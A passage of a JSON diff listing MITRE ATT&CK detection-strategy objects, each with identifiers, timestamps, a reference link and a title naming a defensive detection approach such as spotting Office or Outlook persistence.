+                    "detailed_diff": "{\"dictionary_item_added\": {\"root['revoked']\": false}, \"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2025-10-21 15:10:28.402000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 16:34:50.679000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-detection-strategy",
+                    "id": "x-mitre-detection-strategy--2f20791a-0c97-40c1-a09e-7925321f6f66",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:34:50.673000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0367",
+                            "external_id": "DET0367"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Detect Network Logon Script Abuse via Multi-Event Correlation on Windows",
+                    "x_mitre_analytic_refs": [
+                        "x-mitre-analytic--53dd199d-4f38-4f12-83dd-f2d471d58a1b"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"dictionary_item_added\": {\"root['revoked']\": false}, \"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2025-10-21 15:10:28.402000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 16:34:50.673000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-detection-strategy",
+                    "id": "x-mitre-detection-strategy--552a7d85-4ac4-48cd-9072-61a4c6b2c682",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:34:50.677000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0580",
+                            "external_id": "DET0580"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Detect Network Provider DLL Registration and Credential Capture",
+                    "x_mitre_analytic_refs": [
+                        "x-mitre-analytic--c94f0795-ef0b-4e22-8395-bbba4f28346f"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"dictionary_item_added\": {\"root['revoked']\": false}, \"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2025-10-21 15:10:28.402000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 16:34:50.677000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-detection-strategy",
+                    "id": "x-mitre-detection-strategy--e17b2809-7534-4749-9bd8-95fdb24e4891",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:34:50.695000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0053",
+                            "external_id": "DET0053"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Detect Obfuscated C2 via Network Traffic Analysis",
+                    "x_mitre_analytic_refs": [
+                        "x-mitre-analytic--79c7d394-e772-479c-acf9-ddd05b8a68b9",
+                        "x-mitre-analytic--07deb060-c373-4059-b73b-736688a25c80",
+                        "x-mitre-analytic--dc87f086-1764-43c2-a7bf-1a5ba2ea8191"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"dictionary_item_added\": {\"root['revoked']\": false}, \"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2025-10-21 15:10:28.402000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 16:34:50.695000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-detection-strategy",
+                    "id": "x-mitre-detection-strategy--71a8576b-c9ef-4485-b461-d706fd757a67",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:34:50.681000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0398",
+                            "external_id": "DET0398"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Detect Office Startup-Based Persistence via Macros, Forms, and Registry Hooks",
+                    "x_mitre_analytic_refs": [
+                        "x-mitre-analytic--e643c4aa-dc7d-43d9-b36e-f13d733f8e9a",
+                        "x-mitre-analytic--59bfb473-611f-4443-9d11-f44e7ace93fb"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"dictionary_item_added\": {\"root['revoked']\": false}, \"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2025-10-21 15:10:28.402000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 16:34:50.681000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-detection-strategy",
+                    "id": "x-mitre-detection-strategy--e3718a7a-77b3-4790-99ba-aba7703815fd",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:34:50.695000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0581",
+                            "external_id": "DET0581"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Detect One-Way Web Service Command Channels",
+                    "x_mitre_analytic_refs": [
+                        "x-mitre-analytic--8626f553-efed-4418-bbc6-b9fa83b0b315",
+                        "x-mitre-analytic--e83afa89-0ec1-49e7-b351-eef67b085480",
+                        "x-mitre-analytic--d49f06ba-7a81-440b-bc16-c583ba918a3d",
+                        "x-mitre-analytic--5ce50294-f89c-4158-b5f2-7ca257a88837"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"dictionary_item_added\": {\"root['revoked']\": false}, \"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2025-10-21 15:10:28.402000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 16:34:50.695000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-detection-strategy",
+                    "id": "x-mitre-detection-strategy--53144b02-d6b1-42de-b5cf-e785a59c43bd",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:34:50.677000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0050",
+                            "external_id": "DET0050"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Detect Persistence via Malicious Office Add-ins",
+                    "x_mitre_analytic_refs": [
+                        "x-mitre-analytic--7263a8a8-a06f-4bdc-a021-3529ad683f9d",
+                        "x-mitre-analytic--9ad4670e-f336-454f-960e-4f2f611f3657"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"dictionary_item_added\": {\"root['revoked']\": false}, \"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2025-10-21 15:10:28.402000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 16:34:50.677000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-detection-strategy",
+                    "id": "x-mitre-detection-strategy--83a814c2-73ac-4942-84ad-704a272cd864",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:34:50.683000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0095",
+                            "external_id": "DET0095"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Detect Persistence via Malicious Outlook Rules",
+                    "x_mitre_analytic_refs": [
+                        "x-mitre-analytic--22cba5f6-b3d5-4a1a-9275-ed7db0bd4c7c",
+                        "x-mitre-analytic--8c0c52d0-7357-4073-84fc-d262632d268f"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"dictionary_item_added\": {\"root['revoked']\": false}, \"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2025-10-21 15:10:28.402000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 16:34:50.683000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-detection-strategy",
+                    "id": "x-mitre-detection-strategy--e04f7ddf-6a1e-4731-afd6-5edb74f4c624",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:34:50.695000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0519",
+                            "external_id": "DET0519"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Detect Persistence via Office Template Macro Injection or Registry Hijack",
+                    "x_mitre_analytic_refs": [
+                        "x-mitre-analytic--85b4c967-56bc-4990-b3e2-7e40f3ef1852",
+                        "x-mitre-analytic--17bc7c97-7322-4619-84c5-50e45aa6627d"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"dictionary_item_added\": {\"root['revoked']\": false}, \"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2025-10-21 15:10:28.402000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 16:34:50.695000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-detection-strategy",
+                    "id": "x-mitre-detection-strategy--cb0a01e5-d88a-4ac8-a70a-1472c5dccd10",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:34:50.692000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0315",
+                            "external_id": "DET0315"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Detect Persistence via Office Test Registry DLL Injection",
+                    "x_mitre_analytic_refs": [
+                        "x-mitre-analytic--80be1bd7-b4e8-4d1b-b294-56b1c073bbe0",
+                        "x-mitre-analytic--a677cebe-06e8-4993-bd4c-6a6884862444"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"dictionary_item_added\": {\"root['revoked']\": false}, \"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2025-10-21 15:10:28.402000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 16:34:50.692000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-detection-strategy",
+                    "id": "x-mitre-detection-strategy--75281b94-735d-4051-b400-a42205783af9",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:34:50.681000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0029",
+                            "external_id": "DET0029"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Detect Persistence via Outlook Custom Forms Triggered by Malicious Email",
+                    "x_mitre_analytic_refs": [
+                        "x-mitre-analytic--48cc1694-568f-4602-96e4-cbbe099c6dae",
+                        "x-mitre-analytic--73ec21b3-5679-44a9-bac3-943060bed786"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"dictionary_item_added\": {\"root['revoked']\": false}, \"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2025-10-21 15:10:28.402000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 16:34:50.681000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-detection-strategy",
+                    "id": "x-mitre-detection-strategy--e55f4e4b-80c0-4a2b-8202-659d29bbba33",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:34:50.695000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0177",
+                            "external_id": "DET0177"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Detect Persistence via Outlook Home Page Exploitation",
+                    "x_mitre_analytic_refs": [
+                        "x-mitre-analytic--5ce49e4b-a67f-46ea-b48d-f08f7b942fb4",
+                        "x-mitre-analytic--616755c6-e83d-46ce-ad76-ac706074a575"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"dictionary_item_added\": {\"root['revoked']\": false}, \"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2025-10-21 15:10:28.402000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 16:34:50.695000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-detection-strategy",
+                    "id": "x-mitre-detection-strategy--8febbfe8-91ae-4625-8fc7-656639b90a11",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:34:50.684000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0365",
+                            "external_id": "DET0365"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Detect Registry and Startup Folder Persistence (Windows)",
+                    "x_mitre_analytic_refs": [
+                        "x-mitre-analytic--e863e865-8ecc-47ce-b736-eec54b6399d6"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"dictionary_item_added\": {\"root['revoked']\": false}, \"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2025-10-21 15:10:28.402000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 16:34:50.684000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-detection-strategy",
+                    "id": "x-mitre-detection-strategy--4a11abbc-9637-4d2e-a8ac-39fef2c0256d",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:34:50.676000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0159",
+                            "external_id": "DET0159"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Detect Remote Access via USB Hardware (TinyPilot, PiKVM)",
+                    "x_mitre_analytic_refs": [
+                        "x-mitre-analytic--e1e76ffd-b452-429e-8ea0-a25ba877a2b5",
+                        "x-mitre-analytic--04e9470e-676f-4af0-add4-8103300ebd19",
+                        "x-mitre-analytic--fc3e13fd-cbee-4bb0-aae7-ce1e8af7d768"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"dictionary_item_added\": {\"root['revoked']\": false}, \"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2025-10-21 15:10:28.402000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 16:34:50.676000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-detection-strategy",
+                    "id": "x-mitre-detection-strategy--00a515dc-e3be-4349-9c61-65a5c0ce815d",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:34:50.667000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0048",
+                            "external_id": "DET0048"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Detect Remote Email Collection via Abnormal Login and Programmatic Access",
+                    "x_mitre_analytic_refs": [
+                        "x-mitre-analytic--c42179a8-71c5-41ba-bbfa-d6c1a93e729b",
+                        "x-mitre-analytic--3af413c2-5b26-4f43-b198-11b4dce97a0a"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"dictionary_item_added\": {\"root['revoked']\": false}, \"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2025-10-21 15:10:28.402000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 16:34:50.667000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-detection-strategy",
+                    "id": "x-mitre-detection-strategy--a9de0990-69e9-4b1a-9754-1c7fb4102ac9",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:34:50.687000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0346",
+                            "external_id": "DET0346"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Detect Screen Capture via Commands and API Calls",
+                    "x_mitre_analytic_refs": [
+                        "x-mitre-analytic--20e00aff-6389-4c8a-8e38-3b63924e1612",
+                        "x-mitre-analytic--5f1a4795-74e5-49b9-85bb-e186ca699648",
+                        "x-mitre-analytic--121a5310-3157-47b1-925e-998767c0ec06"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"dictionary_item_added\": {\"root['revoked']\": false}, \"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2025-10-21 15:10:28.402000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 16:34:50.687000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-detection-strategy",
+                    "id": "x-mitre-detection-strategy--d3a3919f-2f04-49f4-808e-1f88538ee02b",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:34:50.694000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0154",
+                            "external_id": "DET0154"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Detect Screensaver-Based Persistence via Registry and Execution Chains",
+                    "x_mitre_analytic_refs": [
+                        "x-mitre-analytic--86dbac4c-1cba-4056-84a1-604eefbb11ac"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"dictionary_item_added\": {\"root['revoked']\": false}, \"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2025-10-21 15:10:28.402000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 16:34:50.694000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-detection-strategy",
+                    "id": "x-mitre-detection-strategy--f09870f8-77d4-4b58-8bda-2b3f2e29c897",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:34:50.697000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0020",
+                            "external_id": "DET0020"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Detect Shell Configuration Modification for Persistence via Event-Triggered Execution",
+                    "x_mitre_analytic_refs": [
+                        "x-mitre-analytic--3ae99176-ce61-4598-834b-f48d13802dcb",
+                        "x-mitre-analytic--6acf01f9-723e-499b-8774-3fa689a36ded"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"dictionary_item_added\": {\"root['revoked']\": false}, \"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2025-10-21 15:10:28.402000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 16:34:50.697000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
